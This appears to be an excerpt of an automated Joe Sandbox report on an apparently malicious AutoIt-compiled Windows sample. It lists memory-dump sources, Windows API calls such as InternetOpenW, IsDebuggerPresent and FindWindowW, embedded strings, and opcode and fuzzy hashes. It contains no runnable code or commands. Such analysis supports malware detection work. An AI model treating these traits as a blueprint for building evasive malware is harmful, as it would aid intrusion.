                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 7a32bd946ab635f7ee2bafe7b10c436339b37bfa893016072c03f40064437767
                                                          • Instruction ID: cd8d1018a7903117385e154edc65d785bf504aecb8aa6ea5e128f66cc5f355c1
                                                          • Opcode Fuzzy Hash: 7a32bd946ab635f7ee2bafe7b10c436339b37bfa893016072c03f40064437767
                                                          • Instruction Fuzzy Hash: 09118275300209AFEF11DF54DC81EFB376AEB483A8F11412AF928972D0D679DC9187A4
                                                          APIs
                                                            • Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
                                                            • Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
                                                            • Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91
                                                          • GetWindowRect.USER32(00000000,?), ref: 00416C71
                                                          • GetSysColor.USER32(00000012), ref: 00416C8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 0133f0cb328e7bdc3c24be925fd579fe46e7aae6662fbce42a42ea63974f14af
                                                          • Instruction ID: 65ed589aadccb772d4d3ffa002d9cc60b19d7952163cdcde89dd1d19087b1345
                                                          • Opcode Fuzzy Hash: 0133f0cb328e7bdc3c24be925fd579fe46e7aae6662fbce42a42ea63974f14af
                                                          • Instruction Fuzzy Hash: 94212972510209AFDF04DFA8CC45AFA7BA9FB08314F014629FD95D2250E635E891DBA4
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 004169A2
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004169B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 3e212537f1c3e96f43355a1370c04753acdca484e195d1fedccc04e2e7ed2f69
                                                          • Instruction ID: 82a57f8c5b54cb0294a5fb389cfb30e5505e3213fa94d704b7779a56898a3b15
                                                          • Opcode Fuzzy Hash: 3e212537f1c3e96f43355a1370c04753acdca484e195d1fedccc04e2e7ed2f69
                                                          • Instruction Fuzzy Hash: B1118FB1120204ABEF108F74DC40AFB376AEB053B8F514726F9A5972E0C739DC959768
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F2A22
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003F2A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 4fd9c55994d438d95d7a9d69fb4219fc474810d2b5f05dd03a4f536abd3e3aed
                                                          • Instruction ID: 5b611f01e9a18c62d9868140b3fa1432207eb0d43c440aeddf1af891f299b971
                                                          • Opcode Fuzzy Hash: 4fd9c55994d438d95d7a9d69fb4219fc474810d2b5f05dd03a4f536abd3e3aed
                                                          • Instruction Fuzzy Hash: B311D03291121CEFCF32EB98D845BBB77B8AB45300F064021EA55E72A0DB70ED0AC795
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0040222C
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00402255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 500d4df12fb656b818dd7fbbca0d7ee91395b40cc93de677740c1e455032474a
                                                          • Instruction ID: 27ca423e3caf3c35ca0bab04e898c980e8e67cf4c6bcf59f4095fab26399f647
                                                          • Opcode Fuzzy Hash: 500d4df12fb656b818dd7fbbca0d7ee91395b40cc93de677740c1e455032474a
                                                          • Instruction Fuzzy Hash: 97112070140221BADB248F918C88EFBFBA8FF06351F10827FF914661C0D2B45885D6F5
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00393C14,004552F8,?,?,?), ref: 003A096E
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          • _wcscat.LIBCMT ref: 003D4CB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: SE
                                                          • API String ID: 257928180-1930506004
                                                          • Opcode ID: 479f8a05f79ad1894ac20a1d9f55e33310509a5e6ad0ae2af34c68ea462c1371
                                                          • Instruction ID: 5125c688d6a25e7a07d2ce4c7526590f782df333aa0f190e6faaa5e1bb47930b
                                                          • Opcode Fuzzy Hash: 479f8a05f79ad1894ac20a1d9f55e33310509a5e6ad0ae2af34c68ea462c1371
                                                          • Instruction Fuzzy Hash: C411C831A05208ABCB06FB64CC06EDE73F8EF09391F0044AABD48DB292EB70D7884715
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003E8E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 2990da416d0b6c44d77d44bff0575350970e4d7d06c8410d0f2d352e444a510d
                                                          • Instruction ID: 2b7496e9b1df99e06d94fd9e7319ed64e583acb784aec7497da3bf03f652e067
                                                          • Opcode Fuzzy Hash: 2990da416d0b6c44d77d44bff0575350970e4d7d06c8410d0f2d352e444a510d
                                                          • Instruction Fuzzy Hash: 2301F171A05228ABDF16EBA1CC419FE7368AF45320B140B19B825AB2E1DF315808C690
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: b3f9e273e9178f825b87c45e26e0d4b9aeb250ba02fdf71f0a72f02ccbfff813
                                                          • Instruction ID: 70325888f01103d8428a8a7e7154d43c73b8808b7b010116a72ff336dcb54e7d
                                                          • Opcode Fuzzy Hash: b3f9e273e9178f825b87c45e26e0d4b9aeb250ba02fdf71f0a72f02ccbfff813
                                                          • Instruction Fuzzy Hash: DF01D6718042186EDB29CBA88816FFEBBF89B15301F00459BF652D6581E974E6048760
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 003E8D6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 7d5b082e699552f9c0fe177593e300221e5528b433e3efbf835bee1945aa3eee
                                                          • Instruction ID: 6ce8ffafe1479039acdfe5cd8efd6066aa759c0d198b2368571472d32eabacf7
                                                          • Opcode Fuzzy Hash: 7d5b082e699552f9c0fe177593e300221e5528b433e3efbf835bee1945aa3eee
                                                          • Instruction Fuzzy Hash: 0601D471A41118ABDF16EBA1CD52AFF73A89F15300F100129B8056B2D1DE155E08D271
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003E8DEE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 3cf5123dabc6a0666cb0c611447692e0e6eb4d7fe25a4fa71180565d6f808ab4
                                                          • Instruction ID: 4487b0bc6673e5d07a2b4ae4210dda48bcf823d49bca045538102989ed2cd969
                                                          • Opcode Fuzzy Hash: 3cf5123dabc6a0666cb0c611447692e0e6eb4d7fe25a4fa71180565d6f808ab4
                                                          • Instruction Fuzzy Hash: D601F271A45218A7EF23EBA5CD52BFF73AC8F15300F100126B805B72D2DE259E09D271
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003EC534
                                                            • Part of subcall function 003EC816: _memmove.LIBCMT ref: 003EC860
                                                            • Part of subcall function 003EC816: VariantInit.OLEAUT32(00000000), ref: 003EC882
                                                            • Part of subcall function 003EC816: VariantCopy.OLEAUT32(00000000,?), ref: 003EC88C
                                                          • VariantClear.OLEAUT32(?), ref: 003EC556
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$ClearCopy_memmove
                                                          • String ID: d}D
                                                          • API String ID: 2932060187-1539258588
                                                          • Opcode ID: 157e92424d7eb09cc1fc77a79d482d09f8762a74871f531eaca4656590eae857
                                                          • Instruction ID: b93c7d91bb652e69e87ccb95d6bf693b4b3e6cf3a494b26debcc61c91a83edd1
                                                          • Opcode Fuzzy Hash: 157e92424d7eb09cc1fc77a79d482d09f8762a74871f531eaca4656590eae857
                                                          • Instruction Fuzzy Hash: 161100B19007089FC710DF9AD88499AF7F8FF18310B50862FE58AD7651E771AA49CB94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: f0d04f4ea9aef8ad8fe4cf4318fdac8039a28e74e45b4568eec9a2675bb89061
                                                          • Instruction ID: e70fdf564af148bec3405aad0d52f309691e1c703369650df6a6946e7e66cbff
                                                          • Opcode Fuzzy Hash: f0d04f4ea9aef8ad8fe4cf4318fdac8039a28e74e45b4568eec9a2675bb89061
                                                          • Instruction Fuzzy Hash: 1BE0923260032C2AE7209A99AC49BA7F7ACEB85B61F01016BFD04D7051E9709A458BE4
                                                          APIs
                                                            • Part of subcall function 003CB314: _memset.LIBCMT ref: 003CB321
                                                            • Part of subcall function 003B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003CB2F0,?,?,?,0039100A), ref: 003B0945
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0039100A), ref: 003CB2F4
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0039100A), ref: 003CB303
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003CB2FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: 676a0f8ea1f429c714515bca7788940768bb8e2ee3a9068240aebdd29b234dc0
                                                          • Instruction ID: 1443817d11cfe301ed1a6e7988baa4c1c4ec40461cf78e66d8bd663e343c7066
                                                          • Opcode Fuzzy Hash: 676a0f8ea1f429c714515bca7788940768bb8e2ee3a9068240aebdd29b234dc0
                                                          • Instruction Fuzzy Hash: 23E092742007408FD722DF28E606786BBE8AF04304F00897DE496C7751EBF9E808CBA1
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003E7C82
                                                            • Part of subcall function 003B3358: _doexit.LIBCMT ref: 003B3362
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 06d962cfce1cf54e6ec5f937ddc170127e0259a4ff48f63ece0276960124e8df
                                                          • Instruction ID: 422e7267def3a9fefaae817e7b5be97f5f93eb3e945cb1ac153b6e87ad67552e
                                                          • Opcode Fuzzy Hash: 06d962cfce1cf54e6ec5f937ddc170127e0259a4ff48f63ece0276960124e8df
                                                          • Instruction Fuzzy Hash: 41D05B323C436836D11732A5AC07FCB75884F15B56F144426FB089D5D349D5958251ED
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 003D1775
                                                            • Part of subcall function 0040BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,003D195E,?), ref: 0040BFFE
                                                            • Part of subcall function 0040BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0040C010
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003D196D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: 3ac3c73c72d3d15df2e22f90cb9e4cd1cfd4be4dfc0a0550e06dfffcdfd3c9c3
                                                          • Instruction ID: 97144fa2e83d0bdfa030ac2fac8d7c5a68d60e99336b1a7c6a2a204847f37a2d
                                                          • Opcode Fuzzy Hash: 3ac3c73c72d3d15df2e22f90cb9e4cd1cfd4be4dfc0a0550e06dfffcdfd3c9c3
                                                          • Instruction Fuzzy Hash: BAF0ED72804109EFDB16DB91D984BECBBF8BB08305F5400A6E102B35A1D7758F85DF68
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041596E
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00415981
                                                            • Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 6a95aa948926db7450e4f788a0baf0b0eac34570612f186966b84303ba4eff7c
                                                          • Instruction ID: 9fbed335455bceea917cfaf0dc60cc42b87b45b2632ec5e2b9789c87154da999
                                                          • Opcode Fuzzy Hash: 6a95aa948926db7450e4f788a0baf0b0eac34570612f186966b84303ba4eff7c
                                                          • Instruction Fuzzy Hash: C1D01231784711BBE664BB709C0FFE76A15BF00B51F104839B34DAE1D2C9F49805C658
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004159AE
                                                          • PostMessageW.USER32(00000000), ref: 004159B5
                                                            • Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 28b0018ffaa18ab054c8df8029b6ad1d3e86b7c55b1f2fc4b4addf1b5fe03982
                                                          • Instruction ID: c82fe1b4aaf29e39c33dd0a463c2831e5441f2113495a16f7dad4c4b1ee61b08
                                                          • Opcode Fuzzy Hash: 28b0018ffaa18ab054c8df8029b6ad1d3e86b7c55b1f2fc4b4addf1b5fe03982
                                                          • Instruction Fuzzy Hash: 0FD0C9317807117AE664AB709C0BFD66615BB04B51F104839B349AA1D2C9E4A805C658